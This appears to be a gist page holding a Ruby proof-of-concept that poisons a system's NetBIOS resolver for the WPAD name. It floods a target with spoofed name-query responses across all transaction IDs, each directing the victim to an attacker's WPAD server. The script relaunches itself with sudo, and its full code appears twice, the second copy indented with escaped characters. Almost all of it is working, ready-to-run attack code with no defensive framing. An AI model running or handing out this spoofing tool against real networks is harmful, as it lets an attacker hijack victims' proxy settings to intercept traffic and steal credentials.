jbarcia/netbios-brute-local.rb

## netbios-brute-local.rb
#!/usr/bin/env ruby
# -*- coding: binary -*-

#
# Poison a system's NetBIOS resolver for the WPAD name (not BadTunnel)
#
#      Usage: ruby netbios-brute-local.rb <evil-wpad-server> <target-ip> <target-port> <pps>
#    Contact: x[at]hdm.io
#    License: https://opensource.org/licenses/BSD-2-Clause
#
# In most cases, this PoC should be directed at port 137
# For NAT exploitation, see https://gist.github.com/hdm/041641b6896779ebb77e04a578001c28
#

require 'socket'
require 'ipaddr'

def get_root
  if RUBY_PLATFORM.index("linux") && Process.euid != 0
    this_sudo = `which rvmsudo`.index("rvmsudo") ? "rvmsudo" : "sudo"
    this_ruby = File.readlink("/proc/self/exe")
    args = [this_sudo, this_ruby, __FILE__, *ARGV]
    exec(*args)
  end
end

def get_socket_address(target, port)
  udp = UDPSocket.new
  udp.setsockopt(Socket::SOL_SOCKET, Socket::SO_BROADCAST, true)
  udp.bind('0.0.0.0', 137)
  udp.connect(target, port)
  family, address = Socket.unpack_sockaddr_in(udp.getsockname)
  [udp, address]
end


def usage
  $stderr.puts "Usage: #{$0} [wpad-server-ip] [target-ip] [target-port] <pps-rate>"
  exit(1)
end

wpad_addr = IPAddr.new( ARGV[0] || usage() )
targ_addr = IPAddr.new( ARGV[1] || usage() )
targ_port = ( ARGV[2] || usage() ).to_i
targ_rate = ( ARGV[3] || 30_000 ).to_i

get_root

sock,self_addr = get_socket_address(targ_addr.to_s, targ_port)

payload = ["FFFF85000000000100000000204648464145424545434143414341434143414341434143414341434143414141000020000100FFFFFF000600000FFFFFFFF"].pack("H*")
payload[58,4] = wpad_addr.hton

stime = Time.now.to_f
pcnt = 0
pps  = 0

$stdout.puts "[*] Spamming WPAD responses to #{targ_addr.to_s}:#{targ_port} at #{targ_rate}/pps..."
loop do
  0.upto(65535) do |txid|
    begin
      payload[0,2] = [txid].pack("n")
      sock.write(payload)
      pcnt += 1

      pps = (pcnt / (Time.now.to_f - stime)).to_i
      if pps > targ_rate
        sleep(0.01)
      end
    end
  end
end
	#!/usr/bin/env ruby
	# -- coding: binary --

	#
	# Poison a system's NetBIOS resolver for the WPAD name (not BadTunnel)
	#
	# Usage: ruby netbios-brute-local.rb <evil-wpad-server> <target-ip> <target-port> <pps>
	# Contact: x[at]hdm.io
	# License: https://opensource.org/licenses/BSD-2-Clause
	#
	# In most cases, this PoC should be directed at port 137
	# For NAT exploitation, see https://gist.github.com/hdm/041641b6896779ebb77e04a578001c28
	#

	require 'socket'
	require 'ipaddr'

	def get_root
	if RUBY_PLATFORM.index("linux") && Process.euid != 0
	this_sudo = `which rvmsudo`.index("rvmsudo") ? "rvmsudo" : "sudo"
	this_ruby = File.readlink("/proc/self/exe")
	args = [this_sudo, this_ruby, __FILE__, *ARGV]
	exec(*args)
	end
	end

	def get_socket_address(target, port)
	udp = UDPSocket.new
	udp.setsockopt(Socket::SOL_SOCKET, Socket::SO_BROADCAST, true)
	udp.bind('0.0.0.0', 137)
	udp.connect(target, port)
	family, address = Socket.unpack_sockaddr_in(udp.getsockname)
	[udp, address]
	end


	def usage
	$stderr.puts "Usage: #{$0} [wpad-server-ip] [target-ip] [target-port] <pps-rate>"
	exit(1)
	end

	wpad_addr = IPAddr.new( ARGV[0] \|\| usage() )
	targ_addr = IPAddr.new( ARGV[1] \|\| usage() )
	targ_port = ( ARGV[2] \|\| usage() ).to_i
	targ_rate = ( ARGV[3] \|\| 30_000 ).to_i

	get_root

	sock,self_addr = get_socket_address(targ_addr.to_s, targ_port)

	payload = ["FFFF85000000000100000000204648464145424545434143414341434143414341434143414341434143414141000020000100FFFFFF000600000FFFFFFFF"].pack("H*")
	payload[58,4] = wpad_addr.hton

	stime = Time.now.to_f
	pcnt = 0
	pps = 0

	$stdout.puts "[*] Spamming WPAD responses to #{targ_addr.to_s}:#{targ_port} at #{targ_rate}/pps..."
	loop do
	0.upto(65535) do \|txid\|
	begin
	payload[0,2] = [txid].pack("n")
	sock.write(payload)
	pcnt += 1

	pps = (pcnt / (Time.now.to_f - stime)).to_i
	if pps > targ_rate
	sleep(0.01)
	end
	end
	end
	end